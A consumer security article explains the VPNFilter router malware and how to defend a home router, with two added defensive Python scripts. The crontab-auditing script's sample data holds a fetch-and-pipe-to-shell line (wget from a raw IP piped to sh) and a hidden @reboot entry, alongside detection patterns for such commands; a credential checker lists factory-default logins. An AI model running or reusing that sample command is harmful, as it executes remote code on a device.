VPNFilter: The Russians Really Are Coming For Your Data

A deadly serious threat is on the loose: a virus called VPNFilter that infects business and consumer-grade routers to steal passwords and other sensitive data from any device on a network served by an infected router. Here’s what you need to know now…

What is VPNFilter Malware?

In addition to stealing passwords, VPNFilter also degrades (decrypts) secure HTTPS connections, both to steal the data passing over them and to pass new infections along to those connections’ destinations. Part of VPNFilter can survive a router reboot and then download other malware modules. It even has a “kill switch” that can destroy the firmware of its host router.

Already, VPNFilter has infected an estimated 500,000 to 1,000,000 routers worldwide, according to Cisco Systems’ Talos Intelligence threat research division.

The FBI attributes VPNFilter to the “Fancy Bear” Russian hacker group, which is implicated in the 2016 hack of the U.S. Democratic National Committee’s network and other political and industrial espionage campaigns. The political news site The Daily Beast reported on May 23rd that the FBI seized a key server used by the VPNFilter botnet. But that hardly slowed the havoc being wrought by VPNFilter, because of the diabolically ingenious way it is designed.

VPNFilter consists of three modules or stages. The first module is a worm, a virus that rapidly slithers from one router to another, infecting each and replicating itself for further infections. Stage One also writes itself into the list of tasks that a vulnerable router performs each time it is rebooted, thereby ensuring that it survives a reboot. Stage One’s next function is to facilitate the other modules’ infection of the host router.

Stage One downloads Stage Two if it is not already present. Stage Two contains the “routine” spying functions that VPNFilter performs on each device connected to an infected router. It sniffs out passwords and other account credentials, contact lists, calendars with birthdays, and other sensitive personal info. Stage Two can also execute any special instructions given to it by optional Stage Three modules, which may also be downloaded by Stage One.

Many Stage Three modules have been discovered since Talos Intelligence started tracking VPNFilter in 2016. For most of that time, it appeared that VPNFilter targeted relatively few but critically important industrial control systems. The infection of consumer routers was thought to be recruitment for a botnet whose primary target was the control systems.
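Because Stage One survives a reboot by adding itself to the router’s list of startup tasks, one place a defender can look for it is that task list. The following is an added example, not code from the article or from Talos: it assumes the task list is a crontab (on Linux-based firmware that is the usual mechanism, but the article does not say so), parses a constructed sample crontab, and flags entries with the traits a reboot-persistent downloader tends to have: running at `@reboot`, fetching from the network, piping fetched content into a shell, executing from a temp directory, or contacting a raw IP address. The sample entries and the IP address in them are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample crontab for this example. It is not taken from any real
# router or from the VPNFilter samples: two ordinary maintenance entries
# followed by two entries of the kind a reboot-persistent stage leaves behind.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /sbin/ntpd -q -p pool.ntp.org
@reboot /var/tmp/.x/svc -d >/dev/null 2>&1
*/15 * * * * wget -q -O - http://198.51.100.23/update.sh | sh
"""

# Heuristics, not signatures: each one describes a behaviour, not a specific file.
DOWNLOADER = re.compile(r"\b(wget|curl|ftpget|tftp)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|a|da)?sh\b")
TEMP_EXEC = re.compile(r"(^|\s)/(var/)?tmp/")
RAW_IP = re.compile(r"\b\d{1,3}(\.\d{1,3}){3}\b")


@dataclass
class Finding:
    line_no: int
    command: str
    reasons: List[str]


def parse_entry(line: str) -> Optional[Tuple[str, str]]:
    """Split one crontab line into (schedule, command).

    Returns None for blank lines and comments. Handles both the five-field
    numeric schedule and the @reboot/@daily style keywords.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):
        sched, _, cmd = line.partition(" ")
        return sched, cmd.strip()
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def audit_crontab(text: str) -> List[Finding]:
    """Return one Finding per crontab entry that matches at least one heuristic."""
    findings: List[Finding] = []
    for n, raw in enumerate(text.splitlines(), 1):
        entry = parse_entry(raw)
        if entry is None:
            continue
        sched, cmd = entry
        reasons = []
        if sched == "@reboot":
            reasons.append("runs at every reboot")
        if DOWNLOADER.search(cmd):
            reasons.append("fetches content from the network")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("pipes fetched content into a shell")
        if TEMP_EXEC.search(cmd):
            reasons.append("executes from a temp directory")
        if RAW_IP.search(cmd):
            reasons.append("contacts a raw IP address")
        if reasons:
            findings.append(Finding(n, cmd, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.command}")
        for r in f.reasons:
            print(f"    - {r}")
```

On a real device you would feed `audit_crontab` the output of `crontab -l` (or the contents of the cron spool directory) taken over the router’s shell. A clean crontab is not proof of a clean router, since the article notes that the same stage can also hide in other startup hooks; the heuristics are a starting point for triage, not a verdict.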

Plenty of Fish

But recent modules show that VPNFilter’s masters are after many more and smaller prey, including your little home network.

One new module can alter incoming data before it’s displayed to users; for example, it can make your bank account balance look normal when in reality the account is being drained dry. Others can steal PGP encryption keys, SSL certificates, and other authentication credentials. Still others can inject malicious payloads into streams of outgoing data to spread VPNFilter and its custom payloads to destination devices.

Libraries of Stage Three modules are scattered all over the Internet. A clever clue to the IP addresses of such libraries was found hidden in the metadata of image files stored on Photobucket. When that resource was removed, Stage One moved on to backup sources.

If Stage One cannot find a library of Stage Three modules, it can go into “listening mode,” passively awaiting new instructions from its human masters. Those instructions may include the locations of libraries, or malicious payloads themselves, or a “kill switch” instruction that causes Stage One to erase itself and the entire file system of its host, effectively turning the router into a brick.

Who Is Vulnerable?

Only routers that run specific Linux-based firmware are vulnerable to VPNFilter. The bad news is that a lot of manufacturers use such firmware on many consumer-grade routers. Note that this vulnerability has nothing to do with the operating system on your computer. It’s the code running inside your router that’s at issue here.

I was going to include a list of vulnerable devices from vendors including Asus, D-Link, Huawei, Linksys, Mikrotik, Netgear, QNAP, TP-Link, Ubiquiti, Upvel, and ZTE, but there are over 100 known so far, and the list is growing. At this point, it seems better to assume that your router is on the list of vulnerable devices.

There’s one important caveat, though. VPNFilter is lazy, so it only tries to break into routers that have the default (factory-supplied) login credentials. If you are certain that you’ve secured your router with a password of your own choosing, then VPNFilter will move on to other targets.

I want to remind readers that your WiFi password (the one you use to connect your computer, tablet or phone to your router) is not the same as your router’s admin password. They are distinct: the router password is used to log in to the router’s setup screens, where one can configure WiFi passwords and other settings.

What To Do About VPNFilter

Some security experts recommend that all router owners, not just owners of routers on this list, perform a factory reset on their routers. A reset restores a router’s firmware to the version that was shipped with it, so VPNFilter will be erased for certain, if it was present.

Most routers have a RESET button on the device. Holding that button down for 10 (or sometimes 30) seconds will reset the router’s login credentials, but may or may not affect the firmware. Because there are so many different router vendors and models, I recommend that you search online for instructions on how to reset your router’s firmware, if you decide to do so.

Next, change that default admin password! The Stage One worm works at lightning speed. It knocks on a router’s door just once, with the default password. If the worm gets no answer, it is vanquished. VPNFilter has gotten as far as it has by relying on the laziness of consumers and of professional IT workers who should know better. Change the router’s password, dang it! If you don’t know how to do that, search online or ask your Internet provider for help.

If your router is more than 4-5 years old, consider replacing it rather than resetting its firmware. The value of an antique router is negligible, a new one can be had for less than $50, and you will have peace of mind knowing that it’s factory-fresh. Your internet provider may even swap out your old router for a new one upon request.
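The two credential points above, that the admin password must not be the factory default and that it is a different secret from the WiFi password, can be turned into a small self-check. This is an added example, not code from the article: the list of factory-default pairs is constructed for illustration (in practice you would load the defaults for your own router model), and the 12-character minimum and the other strength rules are my assumptions, not something the article prescribes.

```python
import re
from typing import List

# Constructed, illustrative set of factory-default (username, password) pairs.
# Not taken from the article or from any vendor manual; replace with the
# documented defaults for the router model you are checking.
DEFAULT_CREDENTIALS = {
    ("admin", "admin"),
    ("admin", "password"),
    ("admin", "1234"),
    ("admin", ""),
    ("root", "root"),
    ("user", "user"),
}

# Assumed minimum length; the article only says to pick a password of your own.
MIN_ADMIN_PASSWORD_LENGTH = 12


def check_router_credentials(admin_user: str, admin_pass: str, wifi_pass: str) -> List[str]:
    """Return a list of problems with the router's admin credentials.

    An empty list means none of the checks fired. The checks follow the
    article's advice: the admin password must not be a factory default, and
    it must not be the same secret you hand out for WiFi access.
    """
    problems: List[str] = []

    # The worm's single attempt uses the factory default, so this is the check that matters most.
    if (admin_user.lower(), admin_pass) in DEFAULT_CREDENTIALS:
        problems.append("admin credentials are a known factory default")

    if admin_pass == "":
        problems.append("admin password is empty")
    elif len(admin_pass) < MIN_ADMIN_PASSWORD_LENGTH:
        problems.append(f"admin password is shorter than {MIN_ADMIN_PASSWORD_LENGTH} characters")

    # The WiFi passphrase is shared with every guest device; the admin password must not be.
    if admin_pass and admin_pass == wifi_pass:
        problems.append("admin password is identical to the WiFi password")

    if admin_pass and re.fullmatch(r"[0-9]+", admin_pass):
        problems.append("admin password is digits only")

    if admin_pass and admin_pass.lower() in {"password", "admin", "router", admin_user.lower()}:
        problems.append("admin password is a trivial word or the username")

    return problems


if __name__ == "__main__":
    # Constructed sample inputs.
    for user, pw, wifi in [
        ("admin", "admin", "guest-wifi-2018"),
        ("admin", "Tq7#vRn2!pLw9zB", "Tq7#vRn2!pLw9zB"),
        ("admin", "Tq7#vRn2!pLw9zB", "guest-wifi-2018"),
    ]:
        result = check_router_credentials(user, pw, wifi)
        print(f"{user}/{pw!r}: {result or 'OK'}")
```

The check runs entirely offline against values you already know; it never contacts the router. It is meant to be run once after the reset and password change described above, to confirm that what you typed into the setup screen is actually different from what the worm will try.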

Bottom line: VPNFilter is powerfully malicious; highly resilient; and spreading like wildfire. This is not a drill. Take all the precautions you can.

Have a great week, from all of us on the ZI staff.